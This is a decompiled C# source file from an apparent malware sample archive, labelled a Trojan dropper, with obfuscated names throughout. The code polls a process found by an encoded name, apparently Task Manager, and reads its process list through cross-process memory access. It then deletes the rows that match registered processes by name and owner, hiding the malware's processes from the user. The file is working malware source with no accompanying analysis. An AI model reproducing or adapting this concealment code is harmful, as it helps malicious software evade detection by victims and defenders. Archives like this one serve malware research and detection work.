MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0008/_0005.cs
2022-08-18 06:28:56 -05:00

175 lines
5.7 KiB
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
using \u0001;
using \u0008;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Management;
using System.Runtime.InteropServices;
using System.Threading;
namespace \u0008
{
internal static class \u0005
{
[NonSerialized]
internal static \u0002 \u0001;
private static bool \u0001;
private static DateTime \u0001;
private static int \u0001;
private static bool \u0002;
public static void \u000F([In] Process obj0)
{
if (!\u0005.\u0001)
\u0005.\u000F();
\u0005.\u0001 obj = new \u0005.\u0001(obj0);
\u0005.\u0002 = true;
}
private static void \u000F()
{
new Thread((ThreadStart) (() =>
{
while (true)
{
\u0005.\u0010();
Thread.Sleep(10);
}
})).Start();
\u0005.\u0001 = true;
}
private static void \u0010()
{
try
{
IntPtr mainWindowHandle = Process.GetProcessesByName(\u0005.\u0001(2426))[0].MainWindowHandle;
\u0006.\u0004 structure = new \u0006.\u0004();
structure.\u0001 = Marshal.SizeOf((object) structure);
\u0006.\u000F(mainWindowHandle, ref structure);
bool flag1 = structure.\u0003 == 1 || structure.\u0003 == 3;
IntPtr num1 = \u0006.\u000F(\u0006.\u000F(mainWindowHandle, IntPtr.Zero, (string) null, (string) null), 1009);
IntPtr num2 = \u0006.\u000F(mainWindowHandle);
IntPtr num3 = \u0006.\u0010(num2, 2);
IntPtr num4 = \u0006.\u0010(num3, 1);
uint num5 = \u0006.\u000F(num3, 0);
if (num4 != IntPtr.Zero)
{
\u0006.\u000F(mainWindowHandle, 273U, (IntPtr) (long) \u0006.\u000F(num4, 3), IntPtr.Zero);
\u0006.\u0010(num3, (uint) (int) num4, 1U);
}
\u0006.\u000F(num2, num5, 1U);
if (flag1)
\u0006.\u000F(num1);
if ((DateTime.Now - \u0005.\u0001).TotalMilliseconds > 1000.0)
{
\u0006.\u000F(mainWindowHandle, 273U, (IntPtr) (long) num5, IntPtr.Zero);
\u0005.\u0001 = DateTime.Now;
}
GC.Collect();
int num6 = (int) \u0006.\u000F(num1, 4100U, IntPtr.Zero, \u0005.\u0001(911));
if (num6 != \u0005.\u0001 || \u0005.\u0002)
{
\u0005.\u0002 = false;
\u0005.\u0001 = num6;
for (int index1 = 0; index1 < num6; ++index1)
{
string[] strArray = new string[10];
for (int index2 = 0; index2 < 10; ++index2)
{
strArray[index2] = \u0005.\u000F(num1, index1, index2).ToLower();
if (index2 > 0 && strArray[index2] == strArray[0])
break;
}
foreach (\u0005.\u0001 obj in \u0005.\u0001.\u0001)
{
bool flag2 = false;
bool flag3 = false;
for (int index3 = 0; index3 < 10 && strArray[index3] != null && (!flag2 || !flag3); ++index3)
{
if (strArray[index3].StartsWith(obj.\u0001))
flag2 = true;
else if (strArray[index3] == obj.\u0002)
flag3 = true;
}
if (flag2 && flag3)
{
\u0006.\u000F(num1, 4104U, (IntPtr) index1--, IntPtr.Zero);
--\u0005.\u0001;
break;
}
}
}
}
if (!flag1)
return;
\u0006.\u000F(IntPtr.Zero);
}
catch
{
}
}
private static string \u000F([In] IntPtr obj0, [In] int obj1, [In] int obj2)
{
\u0006.\u0001 obj = new \u0006.\u0001();
IntPtr hglobal = Marshal.AllocHGlobal(1024);
uint lpdwProcessId;
int num1 = (int) \u0006.\u000F(obj0, out lpdwProcessId);
IntPtr num2 = \u0006.\u000F(2035711U, false, (int) lpdwProcessId);
IntPtr num3 = \u0006.\u000F(num2, IntPtr.Zero, 1024U, 4096U, 4U);
obj.\u0001 = 1U;
obj.\u0001 = obj1;
obj.\u0002 = obj2;
obj.\u0001 = (IntPtr) ((int) num3 + Marshal.SizeOf(typeof (\u0006.\u0001)));
obj.\u0003 = 50;
\u0006.\u000F(num2, num3, ref obj, Marshal.SizeOf(typeof (\u0006.\u0001)), 0);
\u0006.\u000F(obj0, 4101U, IntPtr.Zero, num3);
\u0006.\u000F(num2, num3, hglobal, 1024, 0);
string stringAnsi = Marshal.PtrToStringAnsi((IntPtr) ((int) hglobal + Marshal.SizeOf(typeof (\u0006.\u0001))));
Marshal.FreeHGlobal(hglobal);
\u0006.\u000F(num2, num3, 0, 32768U);
\u0006.\u0010(num2);
return stringAnsi;
}
private static string \u000F([In] Process obj0)
{
foreach (ManagementObject managementObject in new ManagementObjectSearcher(\u0005.\u0001(2439) + (object) obj0.Id).Get())
{
string[] args = new string[1]{ \u0005.\u0001(911) };
if (Convert.ToInt32(managementObject.InvokeMethod(\u0005.\u0001(2504), (object[]) args)) == 0)
return args[0];
}
return \u0005.\u0001(911);
}
static \u0005()
{
\u0003.\u000F();
\u0005.\u0001 = DateTime.Now;
}
private sealed class \u0001
{
public static List<\u0005.\u0001> \u0001 = new List<\u0005.\u0001>();
public string \u0001;
public string \u0002;
public \u0001([In] Process obj0)
{
this.\u0001 = obj0.ProcessName.ToLower();
this.\u0002 = \u0005.\u000F(obj0).ToLower();
lock (\u0005.\u0001.\u0001)
\u0005.\u0001.\u0001.Add(this);
}
}
}
}